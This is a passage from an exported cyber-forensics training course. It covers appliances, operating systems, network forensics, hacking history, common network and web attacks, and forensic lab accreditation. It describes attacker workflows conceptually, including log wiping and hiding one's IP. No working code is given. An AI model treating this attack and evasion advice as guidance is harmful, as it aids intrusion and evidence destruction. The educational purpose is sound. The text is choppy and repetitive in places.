3/5
Hardware: Model System Platforms 8/17/2015
scorm content
Depending on the number of clothes or the weight of the clothes, the machine takes sufficient amount of water. It also takes detergent automatically. It also sets the timer for wash and drying automatically. It does the rest of things automatically. Benefits: It does the rest of things automatically.
Manufacturers The top washing machine manufacturers are LG Samsung Videocon Whirlpool
Microwave oven A microwave oven, often colloquially shortened to microwave is a kitchen appliance. It heats food by bombarding it with electromagnetic radiation. It occurs in the microwave spectrum. It causes polarized molecules in the food. Then it rotates and builds up thermal energy. Application: Heats food
Uses Microwave ovens are used for reheating previously cooked foods. It also cooks vegetables. They are also useful for rapid heating. Sometimes it helps to cook slowly prepared cooking items. Application: Reheating cooked foods and cooking vegetables. Example: Hot butter, fats, and chocolate.
Principle of microwave oven A microwave oven heats food by passing microwave radiation. file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit4/assets/9.html Page 62 of 135
4/5
Hardware: Model System Platforms 8/17/2015
scorm content
It happens through it. Microwaves are a form of nonionizing electromagnetic radiation. It is with a higher frequency than ordinary radio waves but lower than infrared light.
Heating efficiency A microwave oven converts only part of its electrical input into microwave energy. An average consumer microwave oven consumes 1100 W of electricity. It produces 700 W of microwave power, an efficiency of 64%
Design A Transformer or an electronic power converter passes energy to the magnetron. It is a high voltage capacitor connected to the magnetron transformer. It is connected through a diode to the chassis. A cavity magnetron, which converts highvoltage electric energy to microwave radiation.
Benefits and safety Commercial microwave ovens all use a timer. It is set in their standard operating mode. When the timer runs out, the oven turns itself off.
Top manufacturers The top manufacturers of microwave oven are Panasonic Croma Samsung
Advantages They are many advantages of using micro oven. Particularly it helps in following ways. less oil Baking can done only by oven
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit4/assets/9.html Page 63 of 135
5/5
UNIT - 5 Software: Operating Systems, Network Traffic and Applications
Page 64 of 135
Software: Operating Systems, Network Traffic and Applications 8/17/2015
scorm content
Operating system
Operating system (OS) is a collection of software. It manages computer hardware resources. It provides common services for computer programs. Timesharing operating systems schedule tasks for efficient use of the system. It may also include accounting software for cost allocation of processor time. It also includes mass storage, printing, and other resources.
Types of OS There are different types of operating systems. Realtime Multiuser Multitasking Distributed Templated Embedded
Realtime OS A realtime operating system is a multitasking operating system. It aims at executing realtime applications.
MultiuserOS A multiuser operating system allows multiple users. It helps to access a computer system at the same time.
Multitasking OS A multitasking operating system allows more than one program. It is to run at the same time, from the point of view of human time scales.
Distributed OS A distributed operating system manages a group of independent computers. It makes them appear to be a single computer. file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit5/assets/2.html Page 65 of 135
1/2
Software: Operating Systems, Network Traffic and Applications 8/17/2015
scorm content
Templated OS Templating refers to create a single virtual machine image. It occurs in an o/s, distributed and cloud computing context. It is as similar as a guest operating system.
Embedded OS Embedded operating systems are designed for a purpose. It is used in embedded computer systems.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit5/assets/2.html Page 66 of 135
2/2
Software: Operating Systems, Network Traffic and Applications 8/17/2015
scorm content
Network traffic
Net working traffic controls the managing process. It also prioritize the jobs. It controls or reduces the network traffic. Particularly Internet bandwidth is reduced with the help of network traffic.
Uses In order to use these tools effectively, it is necessary to measure the network traffic. It will determine the causes of network congestion. Then it attacks those problems specifically.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit5/assets/3.html Page 67 of 135
1/1
Software: Operating Systems, Network Traffic and Applications 8/17/2015
scorm content
BIOS
The fundamental purposes of the BIOS are to initialize and test the system hardware components. It helps to load a boot loader or an operating system. It occurs from a mass memory device. The BIOS of the original IBM PC/XT had no interactive user interface. Error messages were displayed on the screen. It is also coded in series of sounds. The sounds were generated to signal errors.
BIOS software BIOS software is stored on a nonvolatile ROM chip on the motherboard. It is specifically designed to work with each particular model of computer. It occurs by interfacing with various devices. Eventually the devices make up the complementary chipset of the system.
Boot devices The BIOS selects candidate boot devices. It happens by using information collected by POST and configuration information. The information is collected from EEPROM,CMOS RAM or, in the earliest PCs, DIP switches. Option ROMs may also influence or supplant the boot process. Here the boost process is defined by the motherboard BIOS ROM.
Boot environment The CPU is in real mode and the generalpurpose and segment registers are undefined. The memory below address 0x000500. It contains the interrupt vector table. The 256byte BIOS data area, but the boot program must set up its own stack (or at least MS DOS 6 acts like it must).
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit5/assets/4.html Page 68 of 135
1/1
Software: Operating Systems, Network Traffic and Applications 8/17/2015
scorm content
Network Forensic Analysis
Network Forensic analysis takes traditional protocol analysis. It is performed to the next level by extending the duration. Here, the analyzer can capture packets. These packets have the latest capture, storage and analysis technology.
Applications The main application of network forensic analysis is optimizing network and application performance. Data Center Consolidation – Here network forensic analysis capture unexpected traffic pattern. Then it isolates problems caused during deployment of virtualization. Unified Communication Deployment – It evaluates stability and quality of deployment. It happens during pilot and the first few weeks of operation before contractor warranty ends.
Analysis tool The mission of this network forensic analysis tool is to store information. Then it will analyze the potential information.
Tool selection Performance Visibility Capacity Redundancy Ease of use Depth of Analysis
Performance What is the throughput to disk (not to memory) with no packet loss?
Visibility The following details need to be kept in mind while selecting analysis tool. How many links can one recorder connect to and
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit5/assets/5.html Page 69 of 135
1/2
Software: Operating Systems, Network Traffic and Applications 8/17/2015
scorm content
What kind of topology can it link to? How much will turn on realtime monitoring or data analysis and affect the throughput?
Capacity The details of capacity should be kept in mind by considering following questions. Is the storage specified based on raw storage? Is the real data storage available? Is there a way to filter? Is slice traffic so that only relevant data is stored?
Redundancy Is RAID 5 or 10 used? If not, what happens when the hard disk fails? Will data be lost? How much work does it take to recover the system and/or the data?
Ease of use How difficult is it to analyze the network data captured? Can data collected from different parts of the network be easily aggregated? Can it be segmented and analyzed to get to the root cause?
Depth of Analysis The following factors need to discuss while Dept of analysis occurs. How many applications would the tool be able to decode and support? What about Video and Voice analysis? How is the analysis performance of the solution? Is there an easy way to analyze traffic across the network?
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit5/assets/5.html Page 70 of 135
2/2
Software: Operating Systems, Network Traffic and Applications 8/17/2015
scorm content
Collecting Data
While collecting data the following matters need to be kept in mind. Relations Level of analysis Sources
Examining Data The most effective place to begin a computer forensic investigation is to consult first. The consultation should be done with the client. The consultation is to create a strategy for collecting, analyzing and processing the data.
Data Preservation Electronic evidence, just like other types of evidence is fragile. Entering data and loading software, performs routine system maintenance. It is simply booting a computer which can destroy certain files.
Data Collection Computer forensic experts can retrieve data from virtually all storage. They can also collect data from an operating systems. It includes many antiquated systems. Retrieval of data from seemingly inaccessible media also can be done. Accessing active data on media. Recovering deleted data and/or deleted email.
Data Recovery The data recovery process is an important portion of the forensic analysis.
Testimony and Reporting Once the data analysis is complete, computer forensic engineers can help support the client′s court case. It is done by customizing reports about the data collected and produced. This will support the case Providing data.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit5/assets/6.html Page 71 of 135
1/1
Software: Operating Systems, Network Traffic and Applications 8/17/2015
scorm content
Examining one data source in detail
On the Insight toolbar, click the Admin icon. The Data sources list opens. Any potential problems are marked with an exclamation mark in the list. The most serious problems are at the top of the list.
Examining data Select the data source that is causing concern. Click the data source name link.
Examining data source On the data source summary page, check the information in any of these sections provided for your data source. Event timeline lists events tied to the current status shown in the Data sources list. Events in this summary are displayed per device. Errors are shown in red. Position your mouse pointer on timeline items to display additional information. Devices reported by this data source lists the types of devices, their IP addresses, and links to more detailed information for each device.
After Examining data source Edit the description of the data source to correct the problem. Poll again forces polling to reveal if the problem was persistent or intermittent. Postpone data source polling for 1, 3, or 5 and stop the warning messages. Install a patch on the data source to correct the problem. Prepares an error reports to NetApp Customer Support.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit5/assets/7.html Page 72 of 135
1/1
Software: Operating Systems, Network Traffic and Applications 8/17/2015
scorm content
Data source
A data source is one entry in a data set. For example if octet’s data set has two data sources: rx and tx. Each value in a value list corresponds directly to a data source.
Data source information A data source consists of four pieces of information about the corresponding value. Name (for example rx and tx). Type of the data source (counter, gauge, derive or absolute). Minimum value (NaN equals negative infinity). Maximum value (NaN equals positive infinity).
Data source types The followings are data source types. GAUGE DERIVE COUNTER ABSOLUTE GAUGE A GAUGE value is simply stored asis. This is the right choice for values which may increase as well as decrease. They are such as temperatures or the amount of memory used. Absolute This is probably the most exotic type. It is intended for counters which are reset upon reading. In effect, the type is very similar to GAUGE except. The value is an integer and will be divided by the time since the last reading. This data source type is available since version 4.8.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit5/assets/8.html Page 73 of 135
1/1
Software: Operating Systems, Network Traffic and Applications 8/17/2015
scorm content
Attackers identification
There are three main methods used to perpetrate a session hijack. These are Session fixation. Session side jacking and Crosssite scripting.
Session fixation Session fixation, where the attacker sets a user′s session id to one known to him. For example by sending the user an email with a link that contains a particular session id. The attacker now only has to wait until the user logs in.
Session side jacking In Session side jacking, the attacker uses packet sniffing to read network traffic between two parties. It is done to steal the session cookie. Many web sites use SSL encryption for login pages. This is to prevent attackers from seeing the password.
Crosssite scripting In Crosssite scripting, the attacker tricks the user′s computer into running code. Then it is treated as trustworthy because it appears to belong to the server. So it allows the attacker to obtain a copy of the cookie or perform other operations.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit5/assets/9.html Page 74 of 135
1/1
Software: Operating Systems, Network Traffic and Applications 8/17/2015
scorm content
Email
Electronic mail, most commonly referred to as email or email since ca. 1993. It is a method of exchanging digital messages. It occurs from an author to one or more recipients.
LAN email systems cc:Mail Lantastic WordPerfect Office Microsoft Mail Banyan VINES Lotus Notes
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit5/assets/10.html Page 75 of 135
1/1
Software: Operating Systems, Network Traffic and Applications 8/17/2015
scorm content
Web usage
Internet users are persons using the Internet in the last 12 months from any device. It also includes mobile phones. Penetration is the percentage of a country′s population that are Internet users.
Access subscriptions Fixed broadband access Mobile broadband
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit5/assets/11.html Page 76 of 135
1/1
Software: Operating Systems, Network Traffic and Applications 8/17/2015
scorm content
Hacking Hacking refers to an array of activities.
They are done to intrude someone else’s personal information space. It is done so as to use it for malicious, unwanted purposes. Hacking is a term used to refer to activities aimed at exploiting security flaws. It is to obtain critical information for gaining access to secured networks.
History The followings are some history of hacking. During 1980s Cyberspace coined 414 people arrested Two hacker groups formed 2600 published 1990s National Crackdown on hackers was initiated Kevin Mitnick was arrested Microsoft’s NT operating system was pierced 2001 In one of the biggest denialofservice attack, hackers launched attacks against eBay, Yahoo!, CNN.com., Amazon and others. 2007 Bank hit by “biggest ever” hack. Swedish Bank, Nordea recorded nearly $1 Million has been stolen in three months from 250 customer account.
Famous Hackers The renowned hackers are Ian Murphy Robert Morris file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit5/assets/12.html Page 77 of 135
1/3
Software: Operating Systems, Network Traffic and Applications 8/17/2015
scorm content
Hacker Attitude The world is full of fascinating problems. It is waiting to be solved. Being a hacker is lots of fun, but it′s a kind of fun. It takes lots of effort. The effort takes motivation. To be a hacker you have to get a basic thrill from solving problems. You need to sharpen your skills, and exercising your intelligence. Nobody should ever have to solve a problem twice. Creative brains are a valuable, limited resource. So that it′s almost a moral duty for you to share information. It is to solve problems and then give the solutions. Hackers can solve new problems. instead of perpetually readdress old ones. The followings are hacker attitudes. Boredom and drudgery are evil. Hackers (and creative people in general) should never be bored. They have to drudge at stupid repetitive work. Freedom is good. Hackers are naturally antiauthoritarian. Anyone who can give you orders can stop you. It is from solving whatever problem you′re being fascinated.
Hacking Skills It is the fundamental hacking skill. If you don′t know any computer languages, you can′t do hacking. Get one of the opensource Unix′s and learn to use and run it the single most important step. Any newbie can take towards acquiring hacker skills. It is to get a copy of Linux or one of the BSDUnix’s, file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit5/assets/12.html Page 78 of 135
2/3
Software: Operating Systems, Network Traffic and Applications 8/17/2015
scorm content
Then install it on a personal machine, and run it. Learn how to use the World Wide Web and write HTML. To be worthwhile, your page must have content it must be interesting and/or useful to other hackers.
Hacking Premeasured When you start hacking the first thing you need to do is: To make sure the victim will not find out your real identity. So hide your IP by masking it or using a anonymous proxy server. This is only effective when the victim has no knowledge about computers and internet. Organizations like the F.B.I, C.I.A and such will find you in no time, so beware.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit5/assets/12.html Page 79 of 135
3/3
Software: Operating Systems, Network Traffic and Applications 8/17/2015
scorm content
IP Address
Every system connected to a network has a unique Internet Protocol (IP). Address which acts as its identity on that network. An IP Address is a 32bit address which is divided into four fields of 8bits each. For Example, 203.94.35.12. All data sent or received by a system will be addressed from or to the system.
IP Address finding A remote IP Address can easily be found out by any of the following methods. Through Instant Messaging Software, Through Internet Relay Chat, Through Your website, Through Email Headers.
IP Address finding via website One can easily log the IP Addresses of all visitors to their website by using simply JAVA applets or JavaScript code.
Counter measures One should surf the Internet through a Proxy Server. One can also make use of the numerous Free Anonymous Surfing Proxy Services. For Example, www.anonymizer.com
IP Address finding via email Hotmail.com along with numerous other Email Service Providers, add the IP Address of the sender to each outgoing email. A Typical excerpt of such a Header of an email sent from a Hotmail account is ReturnPath: [email protected]
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit5/assets/13.html Page 80 of 135
1/1
Software: Operating Systems, Network Traffic and Applications 8/17/2015
scorm content
Dangers & Concerns
DOS Attacks Disconnect from the Internet Trojans Exploitation Geographical Information File Sharing Exploits
NETWORK HACKING A typical attacker works in the following manner: Identify the target system. Gathering Information on the target system. Finding a possible loophole in the target system. Exploiting this loophole using exploit code. Removing all traces from the log files and escaping without a trace.
Port Scanning Port Scanning means to scan the target system in order to get a list of open ports (i.e. ports listening for connections) and services running on these open ports. Port Scanning is normally the first step that an attacker undertakes. It is used to get a list of open ports, services and the Operating System running on the target system. It can be performed easily by using different methods. Manual Port Scanning can be performed using the famous ‘Telnet’ program. It is often the first tell tale sign, that gives an attacker away to the system administrator.
TCP Connect Scanning Port Scanner establishes a full 3way TCP\IP Handshake with all ports on the remote system. The regular 3way TCP\IP Handshake has been depicted below: ClientSYN Packet Host HostSYN\ACK Packet Client ClientACK Packet Host file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit5/assets/14.html Page 81 of 135
1/5
Software: Operating Systems, Network Traffic and Applications 8/17/2015
scorm content
Accurate and Fastest Port Scanning Method.
Security Threats Port Scanning is commonly used by computer attackers to get the following information about the target system: List of Open Ports Services Running Exact Names and Versions of all the Services or Daemons. Operating System name and version.
Major Tools Some of the best and the most commonly used Port Scanners are Nmap, Superscan, Hping. Common Features of all above Port Scanners: Very Easy to Use, Display Detailed Results
CounterAttacks It is impossible to stop clients from Port Scanning. Some useful AntiPort Scanning software available are: Scanlogd (A Unix based Port Scan Detector & Logger), BlackICE (A Windows based Port Scan Detector & Logger), Snort: A packet sniffer cum IDS, Abacus Port sentry: Capable of Detecting both normal and stealth port scanning attempts.
ICMP Scanning The Internet Control Message Protocol (ICMP) is the protocol used for reporting errors that might have occurred while transferring data packets over networks. Extremely Useful in Information Gathering. Originally, designed for network diagnosis and to find out as to what went wrong in the data communication. It can be used to find out the following: Host Detection, Operating System Information, Network Topography Information and Firewall Detection.
Host Detection Techniques ICMP Host Detection technique ‘ping’ command or utility.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit5/assets/14.html Page 82 of 135
2/5
Software: Operating Systems, Network Traffic and Applications 8/17/2015
scorm content
The ‘ping’ utility can be used to determine whether the remote host is alive or not. The ping command can be used by the attacker for the following purposes: Host Detection Purposes, To clog up valuable network resources by sending infinite ‘Echo request’ ICMP messages.
Ping Host Detection Below is sample output of a PING command executed on a Windows machine:
Types of Attacks There are an endless number of attacks, to protect his system Denial of Services attacks (DOS Attacks). Threat from Sniffing and Key Logging, Trojan Attacks, IP Spoofing, Buffer Overflows.
DOS Attacks DOS Attacks are aimed at denying valid, legitimate Internet and Network users access to the services offered by the target system. In other words, a DOS attack is one in which you clog up so much memory on the target system. It cannot serve legitimate users. There are numerous types of Denial of Services Attacks or DOS Attacks.
Ping of Death Attack The maximum packet size allowed to be transmitted by TCP\IP on a network is 65 536 bytes. In the Ping of Death Attack, a packet having a size greater than this maximum size allowed by TCP\IP is sent to the target system. As soon as the target system receives a packet exceeding the allowable size. Then it crashes, reboots or hangs. This attack can easily be executed by the ‘ping’ command.
SMURF Attacks In SMURF Attacks, a huge number of Ping Requests are sent to the Target system. It is done using Spoofed IP Addresses from within the target network. Due to infinite loops thus generated and due to the large number of Ping Requests, the target system will crash, restart or hang up.
Sniffers file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit5/assets/14.html Page 83 of 135
3/5
Software: Operating Systems, Network Traffic and Applications 8/17/2015
scorm content
Capture all data packets being sent across the network in the raw form. It is commonly used for: Traffic Monitoring, Network Trouble shooting, Gathering Information on Attacker. For stealing company Secrets and sensitive data. Commonly Available Sniffers, tcpdump, Ethereal, Dsniff.
Working Sniffers work along with the NIC, capturing all data packets in range of the compromised system.
Counter measures Switch to Switching Networks. Only the packets meant for that particular host reach the NIC. Use Encryption Standards like SSL, SSH, IPsec.
Key loggers Record all keystrokes made on that system. Store them in a log file. It can later automatically be emailed to the attacker.
Trojans Trojans act as a RAT or Remote Administration Tool, which allow remote control and remote access to the attacker.
Working The Server Part of the Trojan is installed on the target system through trickery or disguise. This server part listens on a predefined port for connections. The attacker connects to this Server Part using the Client part of the Trojan on the predefined port number. Once this is done, the attacker has to complete control over the target system.
Detection & Countermeasures Port Scan your own system regularly. If you find an irregular port open, on which you usually do not have a service running. Then your system might have a Trojan installed.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit5/assets/14.html Page 84 of 135
4/5
Software: Operating Systems, Network Traffic and Applications 8/17/2015
scorm content
One can remove a Trojan using any normal AntiVirus Software.
Live Example: Hacking NetBIOS NetBIOS (Network Basic Input/output System) was originally developed by IBM as an Application Programming Interface (API) for client software to access LAN resources. Since its creation its strictest sense, NetBIOS is an interface specification for accessing networking services.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit5/assets/14.html Page 85 of 135
5/5
Software: Operating Systems, Network Traffic and Applications 8/17/2015
scorm content
Internet Application Security
WHID (Web Hacking Incident Database) annual report for 2007, 67% percent of the attacks in 2007 was "for profit" motivated. And it has targeted the WebApplications. Acunetix, a leading vendor of web application security solutions, revealed that on average 70% of websites are at serious and immediate risk of being hacked. Every 1500 lines of code has one security vulnerability.
Attacks on Web Application Mobile Application, Browser Application. Internet data is shared. 24 / 7
Hacking Methods A typical attacker works in the following manner. Identify the target system by gathering Information on the target system. Finding a possible loophole in the target system. Exploiting this loophole using exploit code. Removing all traces from the log files and escaping without a trace.
Fundamental Methodology Foot printing, Discovery of Web application, Profiling, Getting Real Attack Points, Exploit the system Finding the defend mechanism and approach for them.
Foot Printing IP Address and Port as start point for assessment MYTH What if IP address is multihosted? One IP can have more application to assess. Finding web application running on domain.
Analysis tool file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit5/assets/15.html Page 86 of 135
1/3
Software: Operating Systems, Network Traffic and Applications 8/17/2015
scorm content
The mission of this network forensic analysis tool is to store and then analyze. Host Foot printing. Domain Foot printing. Both focus on Web application. Tools and method.
WebApplication Attributes Query String Java script Cookie script Path to cgibin Others
Why Vulnerable? Poor Web Application coding Insecure deployment of web application Insufficient input validation No web traffic filtering Web application attributes are not guarded well For example Query String
Classes of Attacks Authentication: The Authentication section covers attacks that target a web site′s method of validating the identity of a user, service or application. Authorization: The Authorization section covers attacks that target a web site′s method of determining if a user, service, or application has the necessary permissions to perform a requested action. Clientside Attacks : The Clientside Attacks section focuses on the abuse or exploitation of a web site′s users. Command Execution : The Command Execution section covers attacks designed to execute remote commands on the web site. Logical Attacks : The Logical Attacks section focuses on the abuse or exploitation of a web application′s logic flow. file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit5/assets/15.html Page 87 of 135
2/3
Software: Operating Systems, Network Traffic and Applications 8/17/2015
scorm content
Brute force: A Brute Force attack is an automated process of trial and error used to guess a person′s username, password, creditcard number or cryptographic key. Crosssite Scripting: Crosssite Scripting (XSS) is an attack technique that forces a web site to echo attackersupplied executable code, which loads in a user′s browser. SQL Injection: SQL Injection is an attack technique. It is used to exploit web sites that construct SQL statements from usersupplied input. XPath Injection: XPath Injection is an attack technique used to exploit web sites that construct XPath queries from usersupplied input.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit5/assets/15.html Page 88 of 135
3/3
UNIT - 6 Standard Operating Procedures: Digital Forensic Laboratory Accreditation Standards
Page 89 of 135
Standard Operating Procedures: Digital Forensic Laboratory Accreditation Standards 8/17/2015
scorm content
Introduction to Digital Forensics Lab
Digital Forensics Lab process The process of constructing a new forensic laboratory revolves around four general activities. They are as follows ; planning, design, construction and moving
Planning Planning is a stage of activity in the Digital Forensics Lab process. Key to the planning stage is a Needs Assessment/Design Program.
Design Design is the second stage of activity in the Digital Forensics Lab process. It includes, Site access. Emergency and service access. Site lighting. Design is of two types. They are, Landscape design. Parking design.
Security Design Security Strategy Meeting. Escort only design. Door access systems. Door status monitoring. Closed circuit television (CCTV) systems. Special security design features.
Electrical Systems Design Checklist
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit6/assets/2.html Page 90 of 135
1/3
Standard Operating Procedures: Digital Forensic Laboratory Accreditation Standards 8/17/2015
scorm content
The following are the Electrical systems design checklist. Emergency generator. Uninterruptable power supply (UPS).
General Laboratory Design The following are the key things of General Laboratory Design Bench top work surfaces. Biological hoods. Handsfree sinks. Evidence drying rooms. The types of rooms for Controlled Substance Section are as follows ; Instrumentation room. Evidence storage room. The types of rooms for Toxicology Section are as follows ; Robotics. Radioimmunoassay room. The types of rooms for Firearms/Tool marks Section are as follows ; Comparison microscopy room. Test fire range. Xray Diffraction (XRD) room. Scanning electron microscope room. The types of rooms for Forensic Biology/DNA Section are as follows ; Wet blood preparation room. Freezer storage room. Refrigerated storage room. Reagent preparation room. Electrophoresis room. Photo room. Mitochondrial DNA (mtDNA) room. file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit6/assets/2.html Page 91 of 135
2/3
Standard Operating Procedures: Digital Forensic Laboratory Accreditation Standards 8/17/2015
scorm content
Research and development/methods development room. The types of rooms for Latent Prints Section are as follows ; Chemical processing room. Evidence storage room. Main Questioned Documents Laboratory Space. Administrative work spaces. Main computer evidence laboratory space. Dry firesuppression system.
Building The types of rooms for building Section are as follows ; Mechanical. Communications. Staff use. Other.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit6/assets/2.html Page 92 of 135
3/3
Standard Operating Procedures: Digital Forensic Laboratory Accreditation Standards 8/17/2015
scorm content
Forensic Computer Examiner
The Certified Forensic Computer Examiner (CFCE) credential was the first certification demonstrating competency in computer forensics in relation to Windows based computers. The CFCE training and certification is conducted by the International Association of Computer Investigative Specialists (IACIS). It is a nonprofit, all volunteer organization of current and former law enforcement members.
Digital Forensic Examiner Checklist The following question is a Digital Forensic Examiner Checklist. Does each examiner have a minimum of a high school diploma or equivalent education certification? Does each examiner have a minimum of eightyhours of digital forensic training? Is all formal training received from a person approved as an instructor in the discipline being taught? Are training syllabi or certification of completion maintained on file for each class attended? Does each examiner hold an industry recognized certification in digital forensics? Has each examiner successfully completed, at a minimum an annual or semiannual proficiency exam? Is each examiner knowledgeable in the use of the examination equipment, software, and the procedures used in conducting examinations? The following is a Digital Forensic technician Checklist Begin tracking the manhours you put into the media analysis and administrative work. Verify search authority, consent, warrant, and subpoena for exact legal level of analysis. Ensure what level of analysis and what files you can examine. i.e., Does the warrant cover email, unopened email, etc. Get a copy of this document and place it in your analysis case file. Pull up the master of the case documentation file and place it in the analysis case file. Create a modified boot disk for the forensic software (Encase). Ensure it is of the current version loaded on the forensic machine. Fill out all the necessary and place all initial case documentation in this file file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit6/assets/3.html Page 93 of 135
1/3
Standard Operating Procedures: Digital Forensic Laboratory Accreditation Standards 8/17/2015
scorm content
So that you can keep track of important details from the start of the forensic exam.
Preparing a case file Ensure you have a search warrant or consent to search when you open a case file, And ask the submitting officer to fill out the "Official Request for Laboratory Examination." The most important part of this form is for the officer to fill out the keywords in the investigation that he wants you to search the computer for. The following is a part of Preparing a case file in the Digital Forensic technician Checklist Create a Report to Attach to the Media Analysis Worksheet Current date and time (include appropriate time zone) Significant problems/broken items Lapses in analysis Special techniques required or used above and beyond normal processes (e.g., password cracker) Create a Keyword List
Create a list of keywords The following are the part of Preparing a case file in the Digital Forensic technician Checklist. Create a list of keywords to be searched or get the list from the officer on the case. Place a copy of this in your analysis case file.
Create Findings and Analysis CDs Copy evidentiary files from your "save" subdirectory on the evidenceprocessing computer to a CDROM. Be certain to include the appropriate utilities on the CDROM for recreation of the original files by the end user (district attorney, investigator, defense). Be sure to make a spare copy of this evidentiary CD to place in evidence. Include in the final report the Encase report (keyword listing, logical file listings, search results, and a thorough listing of physical image files, free space, slack space, and deleted files, where appropriate).
Case Report Writing and Documentation The following question are the Digital Forensic Examiner Checklist Signed original "Computer Forensic file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit6/assets/3.html Page 94 of 135
2/3
Standard Operating Procedures: Digital Forensic Laboratory Accreditation Standards 8/17/2015
scorm content
Investigative Analysis Report" Keyword lists used Request for support
Notes of Importance Don′t make any assumptions. If you discover an email, don′t assume you know the recipient′s name from the email address alone. An email addressed to "Matt," whose email address is [email protected], does not necessarily mean that the recipient′s name is Matt Smith. Email addressed can be faked easily. Spell check is your friend. Don′t wait for a supervisor or district attorney to proofread your report! Spell check it before it leaves your machine.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit6/assets/3.html Page 95 of 135
3/3
Standard Operating Procedures: Digital Forensic Laboratory Accreditation Standards 8/17/2015
scorm content
Digital Forensic accreditation
The accreditation process focuses on the three essential elements of a digital forensic case, They are Computer Network Evidence Recovery and Analysis and Digital Evidence Analysis, Recovery & Preservation and Interpretation of the information in a forensic context. All three areas (including IEPE) will be assessed in specific digital/computer type courses. i.e. BSc (Hons) Digital Forensics, although it is possible to be accredited for only two of the standards, it is generally expected that accreditation will be against all three. This decision will be made by the CoChair of Standards (Accreditation) and the assessment team.
ACCREDITATION PROCESS Making Contact In the first instance, the university should make contact with the CoChair of the Standards Committee (Accreditation) . It is done by email to briefly discuss the course.
Pricing The university is required to prepare an outline of the courses that are being presented for scrutiny and the component standards that are to be assessed. This document will enable the Society to determine the resources that will be required for the assessment and provide a pricing statement. The Society needs to know how many courses are to be accredited, at what level (undergraduate or postgraduate) and the extent, if any, of overlap between those courses e.g. duplication of modules.
Preparing A Matrix The university will then be required to prepare an indepth matrix for each course showing how the component standards are met by the course material. The format of this is flexible, but typically consists of a Microsoft Excel document mapping the relevant module codes / titles to teach of the component standards and a copy of each of the module outlines/handbooks to allow for more detailed scrutiny.
Assessment Visit An assessment panel will scrutinize the documents. An assessment panel consisting of a chair (professor), one academic and one practitioner will scrutinize the documents, file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit6/assets/4.html Page 96 of 135
1/3
Standard Operating Procedures: Digital Forensic Laboratory Accreditation Standards 8/17/2015
scorm content
To inform the University other Documentation and materials they may wish to consult and then visit the university to assess the resources available.
Result of Assessment The Chair of the Accreditation SubCommittee (ASC) will Endeavour to communicate the decision of the assessment panel to the university as soon as practical as and no later than 2 weeks after the next Society′s Accreditation SubCommittee meeting.
Annual Review It is an important stage in Accreditation process. The university courses that receive accreditation will be reviewed on an annual basis by an assessor.
Guide for Course Providers The service was developed to help establish and maintain standards of education in forensic science. It involves major employers and professional interests. It is the aim of the Society to assist HEIs in To achieving these standards by providing access to advice and guidance. Accreditation is based on a series of Component Standards. The Component Standards address specific areas of forensic practice. They are intended to augment, not replace, the underlying scientific knowledge of the forensic components. For example, the Laboratory Analysis module does not include basic laboratory procedures such as pH measurement, volumetric procedures, or weighing. The standards are therefore the beginnings of an expanded suite that will eventually cover the entire knowledge range within most of the forensic sciences.
Code for each component standard The following indicates the code for each component standard IEPE Interpretation, Evaluation & Presentation of Evidence CSI Crime Scene Investigation Lab Analysis Laboratory Analysis CNERA Computer Network Evidence Recovery and Analysis DEARP Digital Evidence Analysis, Recovery and Preservation file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit6/assets/4.html Page 97 of 135
2/3
Standard Operating Procedures: Digital Forensic Laboratory Accreditation Standards 8/17/2015
scorm content
Anth Forensic Anthropology Arch Forensic Archaeology
